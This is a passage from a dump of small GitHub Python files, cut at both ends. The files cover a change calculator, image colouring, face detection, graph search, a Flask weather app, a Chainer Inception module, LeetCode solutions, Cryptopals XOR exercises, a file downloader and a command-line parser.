generate_json_schema(input_file)\n\n# Write the JSON schema to a file\nwith open(output_schema_file, 'w') as outfile:\n json.dump(json_schema, outfile, indent=4)\n","repo_name":"jcha-ultra/toolkit","sub_path":"python_toolkit/json/extract_json_schema.py","file_name":"extract_json_schema.py","file_ext":"py","file_size_in_byte":2027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32130170171","text":"\"\"\"\r\nCreate a program that allows him to input a certain amount of change, and then 
print how many quarters, dimes, nickels, and pennies are needed to make up the amount. \r\nFor example, if he inputs 1.47, the program will tell him that he needs $1 and 1 quarter, 2 dimes, 0 nickels, and 2 pennies.\r\n\"\"\"\r\nimport string\r\n\r\ndef main():\r\n\tgivenAmount = input(\"Enter amount given by customer: \")\r\n\tbill = input(\"Enter customer's bill: \")\r\n\t\r\n\ttry:\r\n\t\t# round to whole cents so float artefacts (e.g. 0.47000000000000003) cannot leak into the split below\r\n\t\tchange = round(float(givenAmount) - float(bill), 2)\r\n\texcept ValueError:\r\n\t\tprint(\"Amount should be a valid integer or decimal value. Eg: 25 or 5.67\")\r\n\t\treturn main()\r\n\t\r\n\tif change < 0:\r\n\t\tprint(\"The customer needs to give you more money\")\r\n\t\treturn main()\r\n\telif change == 0:\r\n\t\tprint(\"No change to be returned.\")\r\n\telse:\r\n\t\tprint(\"Change = \", change)\r\n\t\tamountParts = str(change).split(\".\")\r\n\t\t\r\n\t\tbigPart = int(amountParts[0])\r\n\t\t# pad the fractional part so that e.g. \"1.5\" yields 50 cents rather than 5\r\n\t\tsmallPart = int(amountParts[1].ljust(2, \"0\"))\r\n\t\t\r\n\t\tprint(\"You need to return: $\", bigPart, \"and\")\r\n\t\t\r\n\t\t#Getting number of coins\r\n\t\tsmallPart = getQuarters(smallPart)\r\n\t\tsmallPart = getDimes(smallPart)\r\n\t\tsmallPart = getNickels(smallPart)\r\n\t\tgetPennies(smallPart)\r\n\t\t\r\n\t\t\r\ndef getQuarters(smallPart):\r\n\tnumberOfQuarters = 0\r\n\tif smallPart >= 25:\r\n\t\tnumberOfQuarters = int(smallPart / 25)\r\n\t\tsmallPart = smallPart % 25\r\n\t\r\n\tprint(numberOfQuarters,\" quarters.\")\r\n\treturn smallPart\r\n\r\ndef getDimes(smallPart):\r\n\tnumberOfDimes = 0\r\n\tif smallPart >= 10:\r\n\t\tnumberOfDimes = int(smallPart / 10)\r\n\t\tsmallPart = smallPart % 10\r\n\t\r\n\tprint(numberOfDimes,\" dimes.\")\r\n\treturn smallPart\r\n\t\r\ndef getNickels(smallPart):\r\n\tnumberOfNickels = 0\r\n\tif smallPart >= 5:\r\n\t\tnumberOfNickels = int(smallPart / 5)\r\n\t\tsmallPart = smallPart % 5\r\n\t\r\n\tprint(numberOfNickels,\" nickels.\")\r\n\treturn smallPart\r\n\t\r\ndef getPennies(smallPart):\r\n\tnumberOfPennies = 0\r\n\tif smallPart >= 1:\r\n\t\tnumberOfPennies = smallPart\r\n\t\r\n\tprint(numberOfPennies,\" pennies.\")","repo_name":"aishsharma/ChangeCalculator","sub_path":"ChangeCalculator.py","file_name":"ChangeCalculator.py","file_ext":"py","file_size_in_byte":1873,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"12245824676","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Nov 18 19:54:45 2021\r\n\r\n@author: hanso\r\n\"\"\"\r\n\r\nimport cv2\r\nimport numpy as np\r\nimport math\r\n\r\n'''open images'''\r\n\r\norimg = cv2.imread('part_candy.png')\r\norimg = orimg.astype(np.float32)\r\nimg = cv2.imread('dmg_candy.png')\r\nimg = img.astype(np.float32)\r\ngray = cv2.imread('gray_candy.png', cv2.IMREAD_GRAYSCALE)\r\ngray = gray.astype(np.float32)\r\nb,g,r = cv2.split(img)\r\nprint (gray)\r\n\r\n'''parameters'''\r\nt=10\r\ngemma =0.1\r\np=2\r\nIm = np.zeros((100,100))\r\nk=0\r\nfor i in range (0,100):\r\n    for j in range (0,100):\r\n        if (i==j):\r\n            Im[i,j] = 1\r\n\r\ngivenb = np.zeros((100,1))\r\ngiveng = np.zeros((100,1))\r\ngivenr = np.zeros((100,1))\r\nfor j in range(0,50):\r\n    givenb[j,0] = b[24,j]\r\n    giveng[j,0] = g[24,j]\r\n    givenr[j,0] = r[24,j]\r\n    givenb[j+50,0] = b[25,j]\r\n    giveng[j+50,0] = g[25,j]\r\n    givenr[j+50,0] = r[25,j]\r\n'''kernel'''\r\nkD = np.zeros((100,100))\r\nfor j in range (0,50):\r\n    for y in range (0,50):\r\n        kD[j,y] = math.exp(-((gray[24,j] - gray[24,y])**p)/4/t)\r\n        kD[j,y+50] = math.exp(-((gray[24,j] - gray[25,y])**p)/4/t)\r\n        kD[j+50,y+50] = math.exp(-((gray[25,j] - gray[25,y])**p)/4/t)\r\n        kD[j+50,y] = math.exp(-((gray[25,j] - gray[24,y])**p)/4/t)\r\n
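# NOTE (added comment, not in the original script): kD is the 100x100 Gram matrix of the\r\n# Gaussian-type kernel k(u, v) = exp(-(u - v)**p / (4*t)) evaluated on the two fully known\r\n# pixel rows (24 and 25); kCD below evaluates the same kernel between every pixel of the\r\n# 50x50 patch and those 100 known samples, so each colour channel is recovered by kernel\r\n# ridge regression: F = kCD @ inverse(kD + gemma*100*Im) @ given.\r\n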
    \r\nkCD = np.zeros((2500,100))\r\nfor x in range (0,50):\r\n    for y in range (0,50):\r\n        for j in range (0,50):\r\n            kCD[y+x*50,j] = math.exp(-((gray[x,y]-gray[24,j])**p)/4/t)\r\n            kCD[y+x*50,j+50] = math.exp(-((gray[x,y]-gray[25,j])**p)/4/t)\r\n\r\nprint(kD)\r\n'''linear solver'''\r\nAb = np.linalg.solve(kD+gemma*100*Im, givenb)\r\nAg = np.linalg.solve(kD+gemma*100*Im, giveng)\r\nAr = np.linalg.solve(kD+gemma*100*Im, givenr)\r\nFb = np.matmul(kCD,Ab)\r\nFg = np.matmul(kCD,Ag)\r\nFr = np.matmul(kCD,Ar)\r\nprint(Ab)\r\nprint(Fb)\r\n\r\n\r\nnewb=np.zeros((50,50))\r\nnewg=np.zeros((50,50))\r\nnewr=np.zeros((50,50))\r\nfor i in range (0,50):\r\n    for j in range(0,50):\r\n        newb[i,j] = Fb[k,0]\r\n        newg[i,j] = Fg[k,0]\r\n        newr[i,j] = Fr[k,0]\r\n        k+=1\r\n\r\nprint(k)\r\nprint(b[25,:])\r\nprint(newb[25,:])\r\n'''show results'''\r\ncolored = cv2.merge([newb,newg,newr])\r\nimg = np.clip(img, 0, 255).astype(np.uint8)\r\norimg = np.clip(orimg, 0, 255).astype(np.uint8)\r\ncolored = np.clip(colored, 0, 255).astype(np.uint8)\r\ngray = np.clip(gray, 0, 255).astype(np.uint8)\r\ncv2.imshow('original' , orimg)\r\ncv2.imshow('given' , img)\r\ncv2.imshow('result' , colored)\r\ncv2.imshow('gray' , gray)\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()","repo_name":"tzhang417/Reproducing-Kernel-Hilbert-Space-Image-Coloring-Based-on-Grayness","sub_path":"rkhs.py","file_name":"rkhs.py","file_ext":"py","file_size_in_byte":2513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"21073616417","text":"#pip install opencv-python\r\nimport cv2\r\nfrom random import randrange\r\n\r\n#load pretrained frontal-face data from OpenCV (the Haar cascade model shipped in the OpenCV GitHub repo)\r\ntrained_face_data = cv2.CascadeClassifier(\"haarcascade_frontalface_default.xml\")\r\n\r\n#capture video from the default webcam\r\nwebcam = cv2.VideoCapture(0)\r\n\r\n#iterate over frames\r\nwhile True:\r\n\r\n    #read current frame\r\n    successful_frame_read, frame = webcam.read()\r\n\r\n\r\n    #convert to greyscale\r\n    greyscaled_img = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\r\n\r\n    #detect faces\r\n    face_coordinates = trained_face_data.detectMultiScale(greyscaled_img)\r\n\r\n    #draw a rectangle around each detected face\r\n    for (x , y, w, h) in face_coordinates:\r\n        #(x , y, w, h)=face_coordinates[0]\r\n        cv2.rectangle(frame ,(x, y), (x+w , y+h) , (randrange(256), randrange(256), randrange(256)), 5)\r\n    \r\n    #display\r\n    cv2.imshow(\"sabya's Face detection app\" ,frame)\r\n    \r\n    #wait 1 millisecond so frames keep advancing without a key press\r\n    key = cv2.waitKey(1)\r\n\r\n    if key == 27: # exit on ESC\r\n        break\r\n#release video capture\r\nwebcam.release()\r\n\r\n\r\nprint(\"code completed\")","repo_name":"sm1216/python","sub_path":"Face_detector2.py","file_name":"Face_detector2.py","file_ext":"py","file_size_in_byte":1166,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"30113738105","text":"# Invite friends and friends of friends\nimport sys\ninput = sys.stdin.readline\nfrom collections import deque\n\n# number of classmates (1-indexed)\nn = int(input())\n# length of the friendship list\nm = int(input())\n\ngraph = [[] for _ in range(n+1)]\nvisited = [False]*(n+1)\n\nfor _ in range(m):\n    a,b = map(int, input().split())\n    graph[a].append(b)\n    graph[b].append(a)\n    \ndef search(start):\n    visited[start] = True\n    que = deque()\n    que.append([start,0])\n    answer=0\n    while que:\n        node,connect = que.popleft()\n        if connect==2:\n            continue\n
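        # added note: nodes at depth 2 (friends of friends) are counted when enqueued\n        # but not expanded further, so the BFS never walks past friend-of-friend\n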
        for nextNode in graph[node]:\n            if not visited[nextNode]:\n                answer+=1\n                visited[nextNode]=True\n                que.append([nextNode, connect+1])\n    return answer\n    \nprint(search(1))","repo_name":"JangAyeon/Algorithm","sub_path":"23-1/boj/5567.py","file_name":"5567.py","file_ext":"py","file_size_in_byte":782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"43597629417","text":"from flask import Flask, render_template, request\r\nfrom getdata import get_weather_data\r\nfrom parseweatherdata import parse_weather_data\r\nimport Flask_Table\r\n\r\napp = Flask(__name__)\r\n\r\ntotal_weather_data = []\r\n\r\n@app.route('/')\r\ndef index():\r\n    return render_template(\"index.html\")\r\n\r\n@app.route('/addlocation', methods = ['POST'])\r\ndef add_another():\r\n    global total_weather_data\r\n    location = request.form['location']\r\n    location_start = request.form['start_date']\r\n    location_end = request.form['end_date']\r\n\r\n    all_location_weather_data = get_weather_data(location)\r\n    location_weather_data = parse_weather_data(all_location_weather_data, location_start, location_end)\r\n    for day_num in location_weather_data:\r\n        location_weather_data[day_num]['location'] = location\r\n    total_weather_data.append(location_weather_data)\r\n    return render_template('addanother.html')\r\n\r\n@app.route('/addanother', methods=['POST'])\r\ndef create_forecast():\r\n    global total_weather_data\r\n    if 'submit' in request.form.values():\r\n        items = Flask_Table.create_flask_table(total_weather_data)\r\n        table = Flask_Table.ItemTable(items)\r\n        return render_template('forecast.html', html_table = table)\r\n    else:\r\n        print('adding another location')\r\n        return render_template('index.html')\r\n\r\n\r\nif __name__ == \"__main__\":\r\n    app.run(debug=True)\r\n\r\n\r\n\r\n","repo_name":"apham727/WeatherForItinerary","sub_path":"application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":1385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"73036318453","text":"import numpy\n\nfrom chainer.functions.activation import relu\nfrom chainer.functions.array import concat\nfrom chainer.functions.pooling import average_pooling_2d\nfrom chainer.functions.pooling import max_pooling_2d\nfrom chainer import link\nfrom chainer.links.connection import convolution_2d\nfrom chainer.links.normalization import batch_normalization\n\n\nclass InceptionBN(link.Chain):\n\n    \"\"\"Inception module of the new GoogLeNet with BatchNormalization.\n\n    This chain acts like :class:`Inception`, except that InceptionBN applies\n    :class:`BatchNormalization` on top of each convolution, the 5x5 convolution\n    path is replaced by two consecutive 3x3 convolution applications, and the\n    pooling method is configurable.\n\n    See: `Batch Normalization: Accelerating Deep Network Training by Reducing \\\n    Internal Covariate Shift `_.\n\n    Args:\n        in_channels (int): Number of channels of input arrays.\n        out1 (int): Output size of the 1x1 convolution path.\n        proj3 (int): Projection size of the single 3x3 convolution path.\n        out3 (int): Output size of the single 3x3 convolution path.\n        proj33 (int): Projection size of the double 3x3 convolutions path.\n        out33 (int): Output size of the double 3x3 convolutions path.\n        pooltype (str): Pooling type. It must be either ``'max'`` or ``'avg'``.\n
        proj_pool (bool): If ``True``, do projection in the pooling path.\n        stride (int): Stride parameter of the last convolution of each path.\n        conv_init: A callable that takes ``numpy.ndarray`` or\n            ``cupy.ndarray`` and edits its value.\n            It is used for initialization of the convolution matrix weights.\n            May be ``None`` to use default initialization.\n        dtype (numpy.dtype): Type to use in\n            ``~batch_normalization.BatchNormalization``.\n\n    .. seealso:: :class:`Inception`\n\n    Attributes:\n        train (bool): If ``True``, then batch normalization layers are used in\n            training mode. If ``False``, they are used in testing mode.\n\n    \"\"\"\n\n    def __init__(self, in_channels, out1, proj3, out3, proj33, out33,\n                 pooltype, proj_pool=None, stride=1, conv_init=None,\n                 dtype=numpy.float32):\n        super(InceptionBN, self).__init__(\n            proj3=convolution_2d.Convolution2D(\n                in_channels, proj3, 1, nobias=True, initialW=conv_init),\n            conv3=convolution_2d.Convolution2D(\n                proj3, out3, 3, pad=1, stride=stride, nobias=True,\n                initialW=conv_init),\n            proj33=convolution_2d.Convolution2D(\n                in_channels, proj33, 1, nobias=True, initialW=conv_init),\n            conv33a=convolution_2d.Convolution2D(\n                proj33, out33, 3, pad=1, nobias=True, initialW=conv_init),\n            conv33b=convolution_2d.Convolution2D(\n                out33, out33, 3, pad=1, stride=stride, nobias=True,\n                initialW=conv_init),\n            proj3n=batch_normalization.BatchNormalization(proj3, dtype=dtype),\n            conv3n=batch_normalization.BatchNormalization(out3, dtype=dtype),\n            proj33n=batch_normalization.BatchNormalization(proj33,\n                                                           dtype=dtype),\n            conv33an=batch_normalization.BatchNormalization(out33,\n                                                            dtype=dtype),\n            conv33bn=batch_normalization.BatchNormalization(out33,\n                                                            dtype=dtype),\n        )\n\n        if out1 > 0:\n            assert stride == 1\n            assert proj_pool is not None\n            self.add_link('conv1',\n                          convolution_2d.Convolution2D(in_channels, out1, 1,\n                                                       stride=stride,\n                                                       nobias=True,\n                                                       initialW=conv_init))\n            self.add_link('conv1n', batch_normalization.BatchNormalization(\n                out1, dtype=dtype))\n            self.out1 = out1\n\n        if proj_pool is not None:\n            self.add_link('poolp', convolution_2d.Convolution2D(\n                in_channels, proj_pool, 1, nobias=True, initialW=conv_init))\n            self.add_link('poolpn', batch_normalization.BatchNormalization(\n                proj_pool, dtype=dtype))\n            self.proj_pool = proj_pool\n\n        self.stride = stride\n        self.pooltype = pooltype\n        if pooltype != 'max' and pooltype != 'avg':\n            raise NotImplementedError()\n\n        self.train = True\n\n    def __call__(self, x):\n        test = not self.train\n        outs = []\n\n        if self.out1 > 0:\n            h1 = self.conv1(x)\n            h1 = self.conv1n(h1, test=test)\n            h1 = relu.relu(h1)\n            outs.append(h1)\n\n        h3 = relu.relu(self.proj3n(self.proj3(x), test=test))\n        h3 = relu.relu(self.conv3n(self.conv3(h3), test=test))\n        outs.append(h3)\n\n        h33 = relu.relu(self.proj33n(self.proj33(x), test=test))\n        h33 = relu.relu(self.conv33an(self.conv33a(h33), test=test))\n        h33 = relu.relu(self.conv33bn(self.conv33b(h33), test=test))\n        outs.append(h33)\n\n        if self.pooltype == 'max':\n            p = max_pooling_2d.max_pooling_2d(x, 3, stride=self.stride, pad=1,\n                                              cover_all=False)\n        else:\n            p = average_pooling_2d.average_pooling_2d(x, 3, stride=self.stride,\n                                                      pad=1)\n        if self.proj_pool is not None:\n            p = relu.relu(self.poolpn(self.poolp(p), test=test))\n        outs.append(p)\n\n        y = concat.concat(outs, axis=1)\n        return y\n
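# Hypothetical usage sketch (editor's addition, not part of the original module;\n# all channel sizes below are illustrative, not from the source):\n#\n#     incbn = InceptionBN(in_channels=192, out1=64, proj3=96, out3=128,\n#                         proj33=16, out33=32, pooltype='avg', proj_pool=32)\n#     y = incbn(x)  # x: (N, 192, H, W); y concatenates 64+128+32+32 channels\n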
","repo_name":"LiuFang816/SALSTM_py_data","sub_path":"python/pfnet_chainer/chainer-master/chainer/links/connection/inceptionbn.py","file_name":"inceptionbn.py","file_ext":"py","file_size_in_byte":5775,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"21"}
+{"seq_id":"73888441332","text":"\"\"\"\nCook the current dish and add the value satisfaction[index] * time; the next dish will be cooked at time time + 1, so add the value of dp[index + 1][time + 1].\nSkip the current dish; the next dish will then be cooked at time time, hence the value dp[index + 1][time].\n\"\"\"\nclass Solution:\n    # TOP-DOWN\n    def maxSatisfaction(self, satisfaction: List[int]) -> int:\n        satisfaction.sort()\n        memo = {}\n        def dp(i, time):\n            if i == len(satisfaction):\n                return 0\n            if (i, time) in memo:\n                return memo[(i, time)]\n            res = max(satisfaction[i]*time + dp(i+1, time+1), dp(i+1, time))\n            memo[(i, time)] = res\n            return res\n        return dp(0, 1)\n\n\n    # BOTTOM-UP\n    def maxSatisfaction(self, satisfaction: List[int]) -> int:\n        satisfaction.sort()\n        n = len(satisfaction)\n        # dp[i][t]: max sum starting from dish i at time t\n        dp = [[0 for i in range(n+2)] for i in range(n+1)]\n        for i in range(n-1, -1, -1):\n            for time in range(n, 0, -1):\n                # print(i, time)\n                dp[i][time] = max(satisfaction[i] * time + dp[i+1][time+1], dp[i+1][time])\n        \n        return dp[0][1]\n\n\n    # BOTTOM-UP (rolling array)\n    def maxSatisfaction(self, satisfaction: List[int]) -> int:\n        satisfaction.sort()\n        n = len(satisfaction)\n        prev = [0 for i in range(n+2)]\n        for i in range(n-1, -1, -1):\n            # dp[t]: max sum starting from time t\n            dp = [0 for i in range(n+2)]\n            for time in range(n, 0, -1):\n                # print(i, time)\n                dp[time] = max(satisfaction[i] * time + prev[time+1], prev[time])\n            prev = dp\n        \n        return prev[1]\n\n\n\n    ","repo_name":"xiaofanc/leetcode","sub_path":"1402-reducing-dishes.py","file_name":"1402-reducing-dishes.py","file_ext":"py","file_size_in_byte":1744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"45151201251","text":"import random\n\nnum = int(input(\"Enter a number between 0 and 5 \"))\nnum1 = random.randint(0,5)\nprint(num1)\nif num1 == num:\n    print(\"You got it right, congratulations\")\n    quit()\nelse:\n    print(\"You got it wrong, try again\")\n","repo_name":"ThalisRuan/Exerc-cios-Python---Curso-em-V-deo","sub_path":"Desafio.26.py","file_name":"Desafio.26.py","file_ext":"py","file_size_in_byte":215,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"8461024264","text":"# Standard library imports\nimport os\nimport sys\nimport sqlite3\nfrom typing import List\n\n# Third-party imports\nimport pandas as pd\n\nclass ModifyDB:\n    \"\"\"\n    Class to modify the euronations.db\n    \"\"\"\n    def __init__(self, db: str = \"euronations.db\"):\n        self.db = sqlite3.connect(db)\n\n    def insert_in_db(\n        self, \n        nation_name:str = None, \n        city_name:str = None, capitol:bool=False, population:int=0,\n        EU:bool=False, NATO:bool=False, commonwealth:bool=False):\n        \"\"\"\n        insert a new value into the database\n        \"\"\"\n
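        # Editor's note (added): the ids below are derived from current row counts,\n        # which works for this single-user loader but is racy under concurrent\n        # writers; an AUTOINCREMENT primary key would be the more robust choice.\n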
        # ------------\n        # Nation Table\n        # ------------\n        cur_n = self.db.cursor()\n        cur_n.execute(\"\"\"SELECT COUNT(id) FROM nations;\"\"\")\n        size_of_n = str(cur_n.fetchall()[0][0] + 1)\n\n        cur_n.execute(\n            \"\"\"\n            INSERT INTO nations(id, nation)\n            VALUES(?,?)\"\"\",\n            (str(size_of_n), nation_name),\n        )\n\n        # ------------\n        # Cities Table\n        # ------------\n        cur_c = self.db.cursor()\n        cur_c.execute(\"\"\"SELECT COUNT(city) FROM cities;\"\"\")\n        size_of_c = str(cur_c.fetchall()[0][0] + 1)\n\n        cur_c.execute(\n            \"\"\"\n            INSERT INTO cities(id, nation_id, city, capitol, population)\n            VALUES(?,?,?,?,?)\"\"\",\n            (str(size_of_c), size_of_n, city_name, capitol, population),\n        )\n\n        # -------------------\n        # Organizations Table\n        # -------------------\n        cur_o = self.db.cursor()\n        cur_o.execute(\"\"\"SELECT COUNT(id) FROM organizations;\"\"\")\n        size_of_o = str(cur_o.fetchall()[0][0] + 1)\n\n        cur_o.execute(\n            \"\"\"\n            INSERT INTO organizations(id, nation_id, EU, NATO, commonwealth)\n            VALUES(?,?,?,?,?)\"\"\",\n            (str(size_of_o), size_of_n, EU, NATO, commonwealth),\n        )\n\n        self.db.commit()\n","repo_name":"MattiaCinelli/EuroNations-SQLitePy","sub_path":"euronations/modify_db.py","file_name":"modify_db.py","file_ext":"py","file_size_in_byte":1856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"35229539583","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nfirstRow = 1\nlastRow = 31\ncurrentRow = firstRow\n\nwhile currentRow <= lastRow:\n    print(\"Row number\", currentRow)\n    currentRow += 1\n\n\n# In[3]:\n\n\nstart = 0\nend = 16\nx = start\n\nwhile x <= end:\n    print(x, 2**x)\n    x += 1\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"Pasiak/UDEMY_PythonFirstSteps","sub_path":"UDEMY_S1_S2/01.77_While.py","file_name":"01.77_While.py","file_ext":"py","file_size_in_byte":298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"20534911724","text":"import array\n\n# Fixed XOR: takes two equal-length binary strings and produces their XOR combination.\ndef fxor(str1, str2):\n    assert len(str1) == len(str2), \"String lengths must be equal.\"\n    arr1 = array.array('B', str1)\n    arr2 = array.array('B', str2)\n    for i in range(len(arr1)):\n        arr1[i] ^= arr2[i]\n    return arr1.tostring()\n\n# Take a string str1 and pad it with chars to length.\ndef str_pad(str1, length, chars):\n    repeats = (length // len(chars)) + 1\n    pad = chars*repeats\n    str1 += pad\n    return str1[:length]\n\n# Repeating-key XOR: takes a string and a repeating key and produces their XOR combination.\ndef rxor(str1, key):\n    key = str_pad(key, len(str1), key)\n    return fxor(str1, key)\n\n# Guesses a 1-byte XOR key for a string.\ndef guess_1byte_xor(str1):\n    str_len = len(str1)\n    scores = {}\n    texts = {}\n    for i in range(32, 126):\n        key = chr(i)\n        key_str = key * str_len\n        plaintext = fxor(str1, key_str)\n        texts[key] = plaintext\n        scores[key] = score(plaintext)\n    # a lower sum-of-squares means closer to English letter frequencies\n    key = min(scores, key=scores.get)\n    high_score = scores[key]\n    text = texts[key]\n    # print 'key: ' + key\n    # print 'text: ' + text\n    return {'key': key, 'score': high_score, 'text': text}\n\n# Score a string based on English letter frequencies.\ndef score(str1):\n    str1 = str1.lower()\n    frequencies = letter_frequencies()\n    ss = 0.0\n    for letter in frequencies.iterkeys():\n        expected_frequency = frequencies[letter]\n        # normalise the raw count so it is comparable with the expected frequency\n        actual_frequency = str1.count(letter) / float(len(str1))\n        ss += pow(actual_frequency - expected_frequency, 2)\n    return ss\n\n# Take a hex-encoded string and convert it to base64.\ndef hex2b64(hex_str):\n    return hex_str.decode('hex').encode('base64')\n\n# Return a dict of English letter frequencies.\ndef letter_frequencies():\n    return {'a':0.08167, 'b':0.01492, 'c':0.02782, 'd':0.04253, 'e':0.12702, 'f':0.02228, 'g':0.02015, 'h':0.06094, 'i':0.06966, 'j':0.00153, 'k':0.00772, 'l':0.04025, 'm':0.02406, 'n':0.06749, 'o':0.07507, 'p':0.01929, 'q':0.00095, 'r':0.05987, 's':0.06327, 't':0.09056, 'u':0.02758, 'v':0.00978, 'w':0.02360, 
'x':0.00150, 'y':0.01974, 'z':0.00074, ' ':0.21}\n\n# Compute Hamming distance between two strings.\ndef hamming(str1, str2):\n return sum(tobits(fxor(str1, str2)))\n\n# Convert string to bits (from stackoverflow).\ndef tobits(s):\n result = []\n for c in s:\n bits = bin(ord(c))[2:]\n bits = '00000000'[len(bits):] + bits\n result.extend([int(b) for b in bits])\n return result\n\n# Guess rxor keysize.\ndef rxor_keysize(str1):\n keysizes = {}\n for keysize in range(2, 40):\n distance = 0\n blocks = [ str1[keysize*i:keysize*(i+1)] for i in range(4) ]\n for i in range(4):\n for j in range(i):\n if (i != j):\n distance += hamming(blocks[i], blocks[j])\n keysizes[keysize] = distance / float(keysize)\n return min(keysizes, key=keysizes.get)\n\n# Crack rxor\ndef rxor_crack(str1, keysize):\n blocks = [ str1[keysize*i:keysize*(i+1)] for i in range(len(str1)/keysize)]\n tblocks = {}\n for i in range(keysize):\n keyblock = ''\n for j in range(len(blocks)):\n keyblock = keyblock + blocks[j][i]\n tblocks[i] = keyblock\n key = ''\n for i in range(keysize):\n key = key + guess_1byte_xor(tblocks[i])['key']\n return key\n\ndef pad_pkcs7(str1, length):\n return str_pad(str1, length, \"\\x04\")\n","repo_name":"danepowell/cryptopals","sub_path":"python/crypt.py","file_name":"crypt.py","file_ext":"py","file_size_in_byte":3399,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"7476164065","text":"import concurrent.futures\nimport scrapper\nfrom download import read_urls, download, unzip_all\nimport os\n\ndef main():\n urls_file = 'urls.txt'\n download_dir = 'downloads'\n if not os.path.exists(urls_file):\n print(\"-------------------- Scrapping --------------------------------------------------\")\n scrapper.start(urls_file)\n urls = read_urls(urls_file)\n print('--------------------------- Downloading ---------------------------------------------')\n print(f'# Files to download: {len(urls)}')\n with concurrent.futures.ThreadPoolExecutor(max_workers=6) as executor:\n executor.map(download, urls)\n unzip_all(download_dir)\n os.remove(urls_file)\n\nif __name__ == '__main__':\n main()","repo_name":"rogerramosruiz/hdri-downloader","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19685915447","text":"def composition(k, genome):\n return sorted((genome[i:i + k] for i in range(len(genome) - k + 1)))\n\n\nif __name__ == '__main__':\n with open('dataset.txt') as f:\n text = f.read()\n\n result = composition(\n int(text.split()[0]),\n text.split()[1])\n\n with open('result.txt', 'w') as r:\n print('\\n'.join(result), file=r)","repo_name":"vladsavelyev/bioinformatics_coursera","sub_path":"4_assembly/composition.py","file_name":"composition.py","file_ext":"py","file_size_in_byte":351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34079475980","text":"class CommandLine:\n __action: str = ''\n\n __name: str = ''\n\n __token1: str = ''\n\n __token2: str = ''\n\n __value: str = ''\n\n __checksum: str = ''\n\n __format: str = ''\n\n __verbose: bool = False\n\n __list: bool = False\n\n __key: str = ''\n\n __valid_actions: [str] = [\n 'add',\n 'clear',\n 'config',\n 'delete',\n 'get',\n 'help',\n 'list',\n 'version',\n 'view'\n ]\n\n @property\n def action(self) -> str:\n return self.__action\n\n @action.setter\n def action(self, value: str):\n self.__action = 
value\n\n @property\n def name(self) -> str:\n return self.__name\n\n @name.setter\n def name(self, value: str):\n self.__name = value\n\n @property\n def token1(self) -> str:\n return self.__token1\n\n @token1.setter\n def token1(self, value: str):\n self.__token1 = value\n\n @property\n def token2(self) -> str:\n return self.__token2\n\n @token2.setter\n def token2(self, value: str):\n self.__token2 = value\n\n @property\n def value(self) -> str:\n return self.__value\n\n @value.setter\n def value(self, value: str):\n self.__value = value\n\n @property\n def checksum(self) -> str:\n return self.__checksum\n\n @checksum.setter\n def checksum(self, value: str):\n self.__checksum = value\n\n @property\n def format(self) -> str:\n return self.__format\n\n @format.setter\n def format(self, value: str):\n self.__format = value\n\n @property\n def verbose(self) -> bool:\n return self.__verbose\n\n @verbose.setter\n def verbose(self, value: bool):\n self.__verbose = value\n\n @property\n def list(self) -> bool:\n return self.__list\n\n @list.setter\n def list(self, value: bool):\n self.__list = value\n\n @property\n def key(self) -> str:\n return self.__key\n\n @key.setter\n def key(self, value: str):\n self.__key = value\n\n def is_valid_action(self, action: str) -> bool:\n return action in self.__valid_actions\n\n def __init__(self, args: [str]):\n self.__parse(args)\n\n def __parse(self, args: [str]):\n if len(args) == 0:\n return\n\n if self.is_valid_action(args[0]):\n # Remove the first element from the array.\n self.action = args.pop(0)\n else:\n # Assume it's ./rpass \n self.action = 'get'\n self.name = args.pop(0)\n\n while len(args) > 0:\n current_arg = args.pop(0)\n\n # First check if there is an argument AFTER the argument that begins with \"--\".\n if current_arg[:2] == '--' and len(args) == 0:\n # These are the switches.\n if current_arg not in ['--verbose', '--list']:\n raise Exception('Argument {0} has no value set'.format(current_arg))\n\n # And now continue with everything else.\n if current_arg == '--name':\n self.name = args.pop(0)\n elif current_arg == '--token1':\n self.token1 = args.pop(0)\n elif current_arg == '--token2':\n self.token2 = args.pop(0)\n elif current_arg == '--value':\n self.value = args.pop(0)\n elif current_arg == '--checksum':\n self.checksum = args.pop(0)\n elif current_arg == '--key':\n self.key = args.pop(0)\n elif current_arg == '--format':\n self.format = args.pop(0)\n elif current_arg == '--verbose':\n self.verbose = True\n elif current_arg == '--list':\n self.list = True\n else:\n raise Exception('Unknown argument: {0}'.format(current_arg))\n\n def validate(self):\n if self.action == 'add':\n if len(self.name) == 0:\n raise Exception('--name not specified')\n elif len(self.token1) == 0:\n raise Exception('--token1 not specified')\n elif len(self.token2) == 0:\n raise Exception('--token2 not specified')\n elif len(self.key) == 0:\n raise Exception('--key not specified')\n elif self.action == 'config':\n if not 